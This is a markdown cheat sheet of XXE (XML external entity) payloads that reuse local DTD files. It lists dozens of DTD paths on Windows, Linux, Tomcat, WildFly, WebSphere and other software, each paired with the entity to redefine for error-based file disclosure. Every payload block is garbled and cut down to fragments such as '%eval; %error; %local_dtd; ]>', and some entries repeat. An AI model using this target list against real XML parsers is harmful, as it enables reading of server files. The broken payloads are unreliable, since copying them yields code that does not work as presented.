# XXE payloads for specific DTDs **DTD File:** `/C:\Windows\System32\wbem\xml\cim20.dtd` **Injectable entity:** `%CIMName` **XXE Payload:** ``` "> %eval; %error; %local_dtd; ]> ``` --- **DTD File:** `/C:\Windows\System32\wbem\xml\wmi20.dtd` **Injectable entity:** `%CIMName` **XXE Payload:** ``` "> %eval; %error; %local_dtd; ]> ``` --- **DTD File:** `/C:\Program Files (x86)\Lotus\Notes\domino.dtd` **Injectable entity:** `%boolean` **XXE Payload:** ``` "> %eval; %error; %local_dtd; ]> ``` --- **DTD File:** `/C:\Windows\System32\xwizard.dtd` **Injectable entity:** `%onerrortypes` **XXE Payload:** ``` "> %eval; %error; %local_dtd; ]> ``` --- **DTD File:** `/usr/share/yelp/dtd/docbookx.dtd` **Injectable entity:** `%ISOamsa` **XXE Payload:** ``` "> %eval; %error; '> %local_dtd; ]> ``` --- **DTD File:** `/usr/local/tomcat/lib/jsp-api.jar!/javax/servlet/jsp/resources/jspxml.dtd` **Injectable entity:** `%URI` **XXE Payload:** ``` "> %eval; %error; %local_dtd; ]> ``` --- **DTD File:** `/usr/local/tomcat/lib/tomcat-coyote.jar!/org/apache/tomcat/util/modeler/mbeans-descriptors.dtd` **Injectable entity:** `%Boolean` **XXE Payload:** ``` "> %eval; %error; %local_dtd; ]> ``` --- **DTD File:** `/usr/share/xml/scrollkeeper/dtds/scrollkeeper-omf.dtd` **Injectable entity:** `%url.attribute.set` **XXE Payload:** ``` "> %eval; %error; %local_dtd; ]> ``` --- **DTD File:** `/opt/IBM/WebSphere/AppServer/properties/sip-app_1_0.dtd` **Injectable entity:** `%condition` **XXE Payload:** ``` "> %eval; %error; %local_dtd; ]> ``` --- **DTD File:** `/usr/share/xml/fontconfig/fonts.dtd` **Injectable entity:** `%constant` **XXE Payload:** ``` "> %eval; %error; %local_dtd; ]> ``` --- **DTD File:** `/usr/share/struts/struts-config_1_1.dtd` **Injectable entity:** `%AttributeName` **XXE Payload:** ``` "> %eval; %error; %local_dtd; ]> ``` --- **DTD File:** `/u01/oracle/wlserver/server/lib/consoleapp/webapp/WEB-INF/struts-config_1_2.dtd` **Injectable entity:** `%AttributeName` **XXE Payload:** ``` "> %eval; %error; %local_dtd; ]> ``` --- **DTD File:** `/usr/share/gtksourceview-4/language-specs/language.dtd` **Injectable entity:** `%itemattrs` **XXE Payload:** ``` "> %eval; %error; %local_dtd; ]> ``` --- **DTD File:** `/usr/lib/gap/pkg/GAPDoc-1.6.2/bibxmlext.dtd` **Injectable entity:** `%n.InProceedings` **XXE Payload:** ``` "> %eval; %error; %local_dtd; ]> ``` --- **DTD File:** `/usr/share/boostbook/dtd/boostbook.dtd` **Injectable entity:** `%boost.common.attrib` **XXE Payload:** ``` "> %eval; %error; %local_dtd; ]> ``` --- **DTD File:** `/opt/jboss/wildfly/modules/system/layers/base/org/apache/lucene/main/lucene-queryparser-5.5.5.jar!/org/apache/lucene/queryparser/xml/LuceneCoreQuery.dtd` **Injectable entity:** `%queries` **XXE Payload:** ``` "> %eval; %error; %local_dtd; ]> ``` --- **DTD File:** `/opt/jboss/wildfly/modules/system/layers/base/org/apache/xml-resolver/main/xml-resolver-1.2.jar!/org/apache/xml/resolver/etc/catalog.dtd` **Injectable entity:** `%publicIdentifier` **XXE Payload:** ``` "> %eval; %error; %local_dtd; ]> ``` --- **DTD File:** `/usr/share/nmap/nmap.dtd` **Injectable entity:** `%attr_numeric` **XXE Payload:** ``` "> %eval; %error; %local_dtd; ]> ``` --- **DTD File:** `/usr/share/liteide/liteeditor/kate/language.dtd` **Injectable entity:** `%commonAttributes` **XXE Payload:** ``` "> %eval; %error; %local_dtd; ]> ``` --- **DTD File:** `/usr/share/libgweather/locations.dtd` **Injectable entity:** `%name` **XXE Payload:** ``` "> %eval; %error; %local_dtd; ]> ``` --- **DTD File:** `/usr/share/libgda-5.0/dtd/libgda-server-operation.dtd` **Injectable entity:** `%paramlist-dtd` **XXE Payload:** ``` "> %eval; %error; '> %local_dtd; ]> ``` --- **DTD File:** `/usr/share/libgda-5.0/dtd/libgda-paramlist.dtd` **Injectable entity:** `%array-dtd` **XXE Payload:** ``` "> %eval; %error; '> %local_dtd; ]> ``` --- **DTD File:** `/usr/share/xml/docutils/docutils.dtd` **Injectable entity:** `%measure` **XXE Payload:** ``` "> %eval; %error; %local_dtd; ]> ``` --- **DTD File:** `/usr/share/dblatex/schema/dblatex-config.dtd` **Injectable entity:** `%attlist.modname` **XXE Payload:** ``` "> %eval; %error; %local_dtd; ]> ``` --- **DTD File:** `/usr/lib64/erlang/lib/docbuilder-0.9.8.11/dtd/application.dtd` **Injectable entity:** `%common` **XXE Payload:** ``` "> %eval; %error; '> %local_dtd; ]> ``` --- **DTD File:** `/usr/local/tomcat/lib/servlet-api.jar!/javax/servlet/resources/XMLSchema.dtd` **Injectable entity:** `%xs-datatypes` **XXE Payload:** ``` "> %eval; %error; '> %local_dtd; ]> ``` --- **DTD File:** `/usr/share/sgml/dtd/xml-core/catalog.dtd` **Injectable entity:** `publicIdentifier` **XXE Payload:** ``` "> %eval; %error; %local_dtd; ]> ``` --- **DTD File:** `/usr/share/xml/schema/xml-core/catalog.dtd` **Injectable entity:** `partialPublicIdentifier` **XXE Payload:** ``` "> %eval; %error; %local_dtd; ]> ``` --- **DTD File:** `/etc/vmware-tools/vgauth/schemas/XMLSchema.dtd` **Injectable entity:** `xs-datatypes` **XXE Payload:** ``` "> %eval; %error; '> %local_dtd; ]> ``` --- **DTD File:** - `/usr/share/perfsuite/dtds/pshwpc/hwpcprofilereport-0.2.dtd` - `/usr/share/perfsuite/dtds/pshwpc/hwpcprofilereport-0.3.dtd` - `/usr/share/perfsuite/dtds/pshwpc/hwpcprofilereport.dtd` - `/usr/share/perfsuite/dtds/pshwpc/hwpcreport-0.3.dtd` - `/usr/share/perfsuite/dtds/pshwpc/hwpcreport.dtd` **Injectable entity:** `machineinfo.dtd` **XXE Payload:** ``` "> %eval; %error; '> %local_dtd; ]> ``` --- **DTD File:** - `/usr/share/perfsuite/dtds/pshwpc/multihwpcprofilereport-0.2.dtd` - `/usr/share/perfsuite/dtds/pshwpc/multihwpcprofilereport-0.3.dtd` **Injectable entity:** `hwpcprofilereport.dtd` **XXE Payload:** ``` "> %eval; %error; '> %local_dtd; ]> ``` --- **DTD File:** - `/usr/share/perfsuite/dtds/pshwpc/multihwpcreport-0.3.dtd` - `/usr/share/perfsuite/dtds/pshwpc/multihwpcreport.dtd` **Injectable entity:** `hwpcreport.dtd` **XXE Payload:** ``` "> %eval; %error; '> %local_dtd; ]> ``` --- **DTD File:** `/usr/share/perfsuite/dtds/pshwpc/psmetrics.dtd` **Injectable entity:** `expr` **XXE Payload:** ``` "> %eval; %error; %local_dtd; ]> ``` --- **DTD File:** `/usr/lib/libreoffice/share/dtd/officedocument/1_0/accelerator.dtd` **Injectable entity:** `boolean` **XXE Payload:** ``` "> %eval; %error; %local_dtd; ]> ``` --- **DTD File:** - `/usr/share/paros/xml/alert.dtd` - `/usr/share/zaproxy/xml/alert.dtd` **Injectable entity:** `alertDef` **XXE Payload:** ``` "> %eval; %error; '> %local_dtd; ]> ``` --- **DTD File:** `/usr/lib/gap/pkg/GAPDoc-1.6.2/bibxmlext.dtd` **Injectable entity:** `n.InProceedings` **XXE Payload:** ``` "> %eval; %error; %local_dtd; ]> ``` --- **DTD File:** - `/usr/share/boostbook/dtd/1.1/boostbook.dtd` - `/usr/share/boostbook/dtd/boostbook.dtd` **Injectable entity:** `boost.common.attrib` **XXE Payload:** ``` "> %eval; %error; %local_dtd; ]> ``` --- **DTD File:** `/usr/share/doc/libxml-libxml-perl/examples/complex/complex.dtd` **Injectable entity:** `f` **XXE Payload:** ``` "> %eval; %error; '> %local_dtd; ]> ``` --- **DTD File:** `/usr/share/doc/libxml-libxml-perl/examples/complex/dtd/f.dtd` **Injectable entity:** `g` **XXE Payload:** ``` "> %eval; %error; '> %local_dtd; ]> ``` --- **DTD File:** - `/usr/share/xml/docbook/stylesheet/docbook-xsl/common/l10n.dtd` - `/usr/share/xml/docbook/xsl-stylesheets-1.79.2/common/l10n.dtd` - `/usr/share/xml/docbook/xsl-stylesheets-1.79.2-nons/common/l10n.dtd` **Injectable entity:** `xmlns` **XXE Payload:** ``` "> %eval; %error; %local_dtd; ]> ``` --- **DTD File:** - `/usr/share/gtksourceview-2.0/language-specs/language.dtd` - `/usr/share/gtksourceview-3.0/language-specs/language.dtd` - `/usr/share/gtksourceview-4/language-specs/language.dtd` **Injectable entity:** `commonAttributes` **XXE Payload:** ``` "> %eval; %error; %local_dtd; ]> ```